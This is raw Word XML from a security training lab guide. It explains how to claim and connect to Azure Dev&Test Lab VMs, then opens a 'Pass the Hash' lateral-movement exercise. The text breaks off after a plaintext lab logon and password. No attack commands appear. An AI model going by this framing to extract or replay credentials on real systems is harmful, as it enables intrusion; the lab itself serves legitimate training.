          <w:p w14:paraId="706F3F49" w14:textId="77777777" w:rsidR="004F1CB6" w:rsidRDefault="004F1CB6" w:rsidP="00E162AD">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Windows Server 2016 Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76DBD42B" w14:textId="77777777" w:rsidR="004F1CB6" w:rsidRDefault="004F1CB6" w:rsidP="00E162AD">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F1CB6" w14:paraId="430302C5" w14:textId="77777777" w:rsidTr="004F4807">
        <w:trPr>
          <w:trHeight w:val="250"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1914" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F65A042" w14:textId="1683F8F0" w:rsidR="004F1CB6" w:rsidRDefault="004F1CB6" w:rsidP="00DA22E9">
            <w:r w:rsidRPr="00C40ECB">
              <w:rPr>
                <w:rFonts w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
            <w:r w:rsidRPr="00C40ECB">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-TD11-CLI1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1914" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="689ACE04" w14:textId="6FC2633A" w:rsidR="004F1CB6" w:rsidRDefault="004F1CB6" w:rsidP="00DA22E9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>CSI</w:t>
            </w:r>
            <w:r w:rsidRPr="0001432C">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>TD11</w:t>
            </w:r>
            <w:r w:rsidRPr="0001432C">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>CLI1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3450" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15DE5C40" w14:textId="77777777" w:rsidR="004F1CB6" w:rsidRDefault="004F1CB6" w:rsidP="00DA22E9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Windows 10 Enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E85D334" w14:textId="77777777" w:rsidR="004F1CB6" w:rsidRDefault="004F1CB6" w:rsidP="00DA22E9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Desktop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C2754C3" w14:textId="77777777" w:rsidR="00CF763D" w:rsidRDefault="00CF763D" w:rsidP="00CF763D"/>
    <w:p w14:paraId="0481C164" w14:textId="7ADFD38B" w:rsidR="00E162AD" w:rsidRDefault="00E162AD" w:rsidP="00E162AD">
      <w:r>
        <w:t xml:space="preserve">Note that the machines have been provisioned in </w:t>
      </w:r>
      <w:r w:rsidR="00A608B1">
        <w:t>March</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20</w:t>
      </w:r>
      <w:r w:rsidR="00A608B1">
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Therefore, it is possible to see the following message while connecting for the first time to the servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E4C2C5" w14:textId="77777777" w:rsidR="00E162AD" w:rsidRDefault="00E162AD" w:rsidP="00E162AD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4357C2B0" wp14:editId="18D4C011">
            <wp:extent cx="4675367" cy="11158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43" t="4456" r="1853" b="3666"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4710182" cy="1124158"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63109DD6" w14:textId="77777777" w:rsidR="00E162AD" w:rsidRDefault="00E162AD" w:rsidP="00E162AD">
      <w:r>
        <w:t>In this case, click on View updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F840346" w14:textId="77777777" w:rsidR="00E162AD" w:rsidRDefault="00E162AD" w:rsidP="00E162AD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34D915C2" wp14:editId="07247531">
            <wp:extent cx="3220720" cy="23129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33" b="9003"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3223110" cy="2314674"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="567E3BEA" w14:textId="77777777" w:rsidR="00E162AD" w:rsidRDefault="00E162AD" w:rsidP="00E162AD"/>
    <w:p w14:paraId="43CD75A5" w14:textId="77777777" w:rsidR="00E162AD" w:rsidRDefault="00E162AD" w:rsidP="00E162AD">
      <w:r>
        <w:t>We do not need the latest updates for these labs so you can close this window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6206B433" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C0044" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc526181846"/>
      <w:bookmarkStart w:id="15" w:name="_Toc44074054"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>How to start and connect to a VM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="36E2EE38" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Lienhypertexte"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to Azure portal : </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://portal.azure.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3AD9B90E" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sign-in with your student or organizational account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9D1857" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Click on the Dev&amp;Test Lab (Select the right subscription if the resource is not displayed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBB9BAC" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F6D9A3C" wp14:editId="3AC2DD58">
            <wp:extent cx="2369185" cy="246380"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="1366"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2369185" cy="246380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4FD5B3" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To start a VM, click on “Claim </w:t>
      </w:r>
      <w:r w:rsidRPr="00684A07">
        <w:t>machine</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C6010D" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B241DF" wp14:editId="3195FE1A">
            <wp:extent cx="5542280" cy="122428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9" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="2299"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5542280" cy="1224280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02234570" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When the machine is started, it will be displayed in the “My Virtual Machines” pane. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00684A07">
        <w:t>After one minute, t</w:t>
      </w:r>
      <w:r>
        <w:t>he status will be Running. You can wait 30 seconds more before trying to connect on it.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2B9AF4" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6241E91C" wp14:editId="1598C3D2">
            <wp:extent cx="5510530" cy="61214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0530" cy="612140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E43E24" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143097BD" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Select the running Virtual Machine and at the end of line, click on “…” then select Connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739EB07" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="209D114E" wp14:editId="44AD91C9">
            <wp:extent cx="5979160" cy="1717675"/>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a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="848"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5979160" cy="1717675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FA3C50" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E8C1EC" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A warning is displayed about the publisher. You can ignore the warning and click on Connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39645420" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51BEAB8D" wp14:editId="1AC830C4">
            <wp:extent cx="3077210" cy="1630045"/>
            <wp:effectExtent l="0" t="0" r="889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30045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC1DD9" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter the user name and password to connect to the Virtual Machine detailed in each exercise below. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(Do not use your student or organizational account.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B11FFF2" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C94D941" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D03A24D" wp14:editId="5F76284E">
            <wp:extent cx="2568575" cy="209931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8575" cy="2099310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="555F737F" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49DEA3A8" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D3939AC" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A warning on the self-issued certificate is displayed. You can safely ignore this warning by clicking on Yes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17666CEE" w14:textId="77777777" w:rsidR="00584AD2" w:rsidRDefault="00584AD2" w:rsidP="00584AD2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52F52B5A" wp14:editId="228CEE91">
            <wp:extent cx="2536190" cy="26003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6190" cy="2600325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3656B9AB" w14:textId="24B58046" w:rsidR="008A1AC1" w:rsidRPr="00E162AD" w:rsidRDefault="00E162AD" w:rsidP="00A973CD">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED3DAA" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="00F954C8" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc43911775"/>
      <w:bookmarkStart w:id="17" w:name="_Toc44074055"/>
      <w:bookmarkStart w:id="18" w:name="_Toc492640586"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exercise 1: Pass the Hash</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6385F6" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="00A973CD" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Duration: 45 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21171B17" w14:textId="142A2A5F" w:rsidR="008719B9" w:rsidRPr="00F954C8" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Synopsis: In this exercise, attendees </w:t>
      </w:r>
      <w:r w:rsidRPr="00D736F1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">will learn how to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">extract and pass secrets it </w:t>
      </w:r>
      <w:r w:rsidR="00F3090E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> achieve lateral movement in an organization</w:t>
      </w:r>
      <w:r w:rsidRPr="00D736F1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E770A57" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc43911776"/>
      <w:bookmarkStart w:id="20" w:name="_Toc44074056"/>
      <w:r>
        <w:t>Task 1: Pass the Hash</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="07D45BF0" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logon to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CSI-TD-CLI1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D7BFBB" w14:textId="77777777" w:rsidR="008719B9" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>admincsi@contoso.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E355F5" w14:textId="77777777" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PiKarAlR@AlBenMo1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37655692" w14:textId="2299209D" w:rsidR="008719B9" w:rsidRPr="007C1E43" w:rsidRDefault="008719B9" w:rsidP="008719B9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ensure that the computer has no pending update</w:t>
      </w:r>
      <w:r w:rsidR="00091BA2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r w:rsidR="00A61796">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>necessary,</w:t>
      </w:r>
      <w:r w:rsidR="00091BA2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> update the machine and Reboot</w:t>
      </w:r>
    </w:p>
